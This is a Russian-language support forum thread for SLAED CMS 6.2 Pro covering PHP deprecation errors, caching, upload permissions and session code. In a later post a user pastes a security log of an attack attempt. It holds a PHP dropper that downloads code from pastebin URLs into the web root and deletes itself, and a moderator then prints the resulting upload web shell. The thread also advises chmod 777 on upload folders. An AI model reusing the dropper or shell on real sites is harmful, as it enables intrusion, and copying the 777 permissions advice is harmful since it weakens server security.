Чтение RSS каналов

Форум

Открыть Ответить

SLAED CMS 6.2 Pro - Проблемы и решения

151
13.09.2018 19:22:23
по первому вопросу - понятно, буду искать.
По второму.
Заработало! УРААА!!
Спасибо.
4.25

4.25
152
21.10.2018 14:46:0121.10.2018 14:46:42
постоянно выскакивают 2 ошибки , можно ли как то их исправить !
[Sun Oct 21 15:42:13.877933 2018] [fcgid:warn] [pid 23964] [client 80.232.241.115:56568] mod_fcgid: stderr: PHP Deprecated: Function create_function() is deprecated in /var/www/nabstar/data/www/n-d-p.ru/function/template.php on line 112, referer: http://www.n-d-p.ru/contact.html
[Sun Oct 21 15:42:13.877951 2018] [fcgid:warn] [pid 23964] [client 80.232.241.115:56568] mod_fcgid: stderr: PHP Deprecated: Function create_function() is deprecated in /var/www/nabstar/data/www/n-d-p.ru/function/template.php on line 46, referer: http://www.n-d-p.ru/contact.html


Версия системы: SLAED CMS 6.* Pro
Версия PHP: 7
Сервер: Сервер в интернете
5

5
153
21.10.2018 15:29:3921.10.2018 17:00:26
nabster, проблема связана с новой версией PHP 7.2, функция create_function больше не будет поддерживаться. Эта функция объявлена устаревшей, начиная с PHP 7.2.0.

Решением является переход на более раннюю версию PHP 7.0 или 7.1.
В следующей версии CMS эта проблема будет решена.

О сколько нам открытий чудных,
Готовит просвещенья дух,
И опыт, сын ошибок трудных,
И гений, парадоксов друг...
3.24

3.24
154
21.10.2018 16:37:05

nabster, проблема связана с новой версией PHP 7.2, функция create_function больше не будет поддерживаться. Эта функция объявлена устаревшей, начиная с PHP 7.2.0.

Решением является переход на более раннюю версию PHP 7.0 или 7.1.
В следующей версии CMS это проблем будет решена.



Большое спасибо за ответ и за помощь , получается не столь трагично можно подождать следующую версию
5

5
155
18.11.2018 17:56:4319.11.2018 17:18:42
Приветствую. У меня 2 проблемы, помогите пожалуйста.

1. Открываю сайт в трёх браузерах и во всех трех проблема с сохранением данных (вход/выход из аккаунта пользователя, данные о пользователях, оставленные комментарии и т.д.), т.е. каждый раз мне приходить наживать f5 чтобы появилась новая информация. Браузеры firefox, chrome, ie . Кэш включал и выключал - без толку, если выключить куки, то выбрасывает из админки очень быстро.

2. Не загружаем файлы на сайт (любые) при ответе на форуме, добавлении комментария, создания новости и т.д. в ББ редакторе жму кнопку обновить и ничего...


Версия системы: SLAED CMS 6.* Pro
Версия PHP: 5
Сервер: Сервер в интернете
0

0
156
19.11.2018 17:12:4119.11.2018 17:17:56
1. Настройки кэширования устанавливаются в отделе администратора: Конфигурации >> Оптимизация >> Активировать кэширование браузером? >> Нет

Рекомендую проверить ответ сервера, а именно заголовки ответа. Во многих браузерах эта возможность предусмотрена по умолчанию-

Например в Firefox: Веб-разработка >> Инструменты разработчика >> Сеть >> Заголовки ответа. Комбинация клавиш: Ctrl + Shift + i

2. Проверти, установлены ли права 777 на соответствующие директории.

Установите права CHMOD 777 для папки uploads/ и все папки содержащиеся в ней и её папках.

Размеры загружаемых файлов устанавливаются в отделе администратора: Загрузки и шаблоны >> Конфигурации

О сколько нам открытий чудных,
Готовит просвещенья дух,
И опыт, сын ошибок трудных,
И гений, парадоксов друг...
3.24

3.24
157
03.02.2019 17:21:52
Подскажите, где объявляется глобальная переменная $admin? В каком файле? Есть необходимость добавить еще пару элементов в массив с данными об админе
4.01

4.01
158
05.02.2019 18:55:5105.02.2019 19:01:22
1. Чтение из сессии и создание переменной производится в файле: function/security.php

# Format admin variable
$admin = isset($_SESSION[$conf['admin_c']]) ? explode(':', addslashes(base64_decode($_SESSION[$conf['admin_c']]))) : false;


2. Запись в сессию производится в файле администратора: admin/admin.php
После успешного входа под админом, в функции: check_admin()

unset($_SESSION[$conf['admin_c']]);
$info = base64_encode($aid.":".$aname.":".$apwd.":".$aeditor);
$_SESSION[$conf['admin_c']] = $info;
$ip = getip();
$db->sql_query("DELETE FROM ".$prefix."_session WHERE uname = '".$ip."'");
$db->sql_query("UPDATE ".$prefix."_admins SET ip = '".$ip."', lastvisit = now() WHERE id = '".$aid."'");
login_report(1, 1, $name, "");
header("Location: ".$admin_file.".php");


Актуально для версии SLAED CMS 6.2 Pro и ниже.

О сколько нам открытий чудных,
Готовит просвещенья дух,
И опыт, сын ошибок трудных,
И гений, парадоксов друг...
3.24

3.24
159
12.03.2019 09:04:3412.03.2019 09:18:23
Я сегодня поймал вирус. Хостинг выдал сообщение.
Вирусный код я нашёл в логах.
Вопрос.То, что в логах остаётся вирусный код это чем-то может грозить или нет? И по логу можно узнать был ли взломан сайт или это только попытка была?
Далее привожу содержание лога.
Дата: 10.03.2019 23:16:38
---
POST: Array
(
    [--ae648f3cef84cec7a96b8786b6906ba7
Content-Disposition:_form-data;_name] => \"name\"

vuln.php
--ae648f3cef84cec7a96b8786b6906ba7
Content-Disposition: form-data; name=\"file\"; filename=\"index.jpg\"

<title>Vuln!! patch it Now!</title>
<?php
function http_get($url){
	$im = curl_init($url);
	curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
	curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($im, CURLOPT_HEADER, 0);
	return curl_exec($im);
	curl_close($im);
}
$check = $_SERVER[\'DOCUMENT_ROOT\'] . \"/images/vuln.php\" ;
$text = http_get(\'https://pastebin.com/raw/phAM8DFH\');
$open = fopen($check, \'w\');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check.\"</br>\";
}else 
  echo \"not exits\";
echo \"done .\\n \" ;

$check2 = $_SERVER[\'DOCUMENT_ROOT\'] . \"/vuln.htm\" ;
$text2 = http_get(\'https://pastebin.com/raw/880ufaWF\');
$open2 = fopen($check2, \'w\');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2.\"</br>\";
}else 
  echo \"not exits\";
echo \"done .\\n \" ;

@unlink(__FILE__);
?>

--ae648f3cef84cec7a96b8786b6906ba7--

)
GET: Array
(
    [option] => com_adsmanager
    [task] => upload
    [tmpl] => component
)
------------------
Дата: 10.03.2019 23:16:59
---
POST: Array
(
    [--a3d990fbfa374c2346d298493ee4d6c1
Content-Disposition:_form-data;_name] => \"option\"

com_fabrik
--a3d990fbfa374c2346d298493ee4d6c1
Content-Disposition: form-data; name=\"field_delimiter\"

,
--a3d990fbfa374c2346d298493ee4d6c1
Content-Disposition: form-data; name=\"text_delimiter\"


    [quot;
--a3d990fbfa374c2346d298493ee4d6c1
Content-Disposition:_form-data;_name] => \"controller\"

import
--a3d990fbfa374c2346d298493ee4d6c1
Content-Disposition: form-data; name=\"tableid\"

0
--a3d990fbfa374c2346d298493ee4d6c1
Content-Disposition: form-data; name=\"overwrite\"

1
--a3d990fbfa374c2346d298493ee4d6c1
Content-Disposition: form-data; name=\"Itemid\"

0
--a3d990fbfa374c2346d298493ee4d6c1
Content-Disposition: form-data; name=\"task\"

doimport
--a3d990fbfa374c2346d298493ee4d6c1
Content-Disposition: form-data; name=\"name\"

me.php
--a3d990fbfa374c2346d298493ee4d6c1
Content-Disposition: form-data; name=\"drop_data\"

1
--a3d990fbfa374c2346d298493ee4d6c1
Content-Disposition: form-data; name=\"view\"

import
--a3d990fbfa374c2346d298493ee4d6c1
Content-Disposition: form-data; name=\"userfile\"; filename=\"files/vuln.txt\"
Content-Type: multipart/form-data

Vuln!! patch it Now!
--a3d990fbfa374c2346d298493ee4d6c1--

)
4.25

4.25
160
12.03.2019 16:48:4812.03.2019 16:57:03
Как правило, если не отключено в конфигурациях, все действия злоумышленников, и соответственно коды инъекций пишутся системой безопасности в лог файл. CMS с лёгкостью отбивает подобные попытки взлома, поэтому не вижу повода для беспокойств.

Судя по логам системы безопасности, была произведена попытка загрузки файла/кода с удалённого сервера по данному адресу: pastebin.com/raw/phAM8DFH/images/

Который и ныне там, содержание можно посмотреть по выше указанной ссылке, код привожу ниже:
<title>Vuln!! patch it Now!</title>

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }
else { echo '<b>Not uploaded ! </b><br><br>'; }
}


Явно используется для заливки файлов на сайт жертвы.

О сколько нам открытий чудных,
Готовит просвещенья дух,
И опыт, сын ошибок трудных,
И гений, парадоксов друг...
3.24

3.24
Открыть Ответить
Хотите опробовать SLAED CMS в действии?

Технологии

PHP MySQL HTML 5 CSS 3 jQuery jQuery UI

Контакты

  • D-49179, Deutschland
    Ostercappeln, Im Siek 6
  • +49 176 61966679

  • https://slaed.net
Идеи и предложения
Обратная связь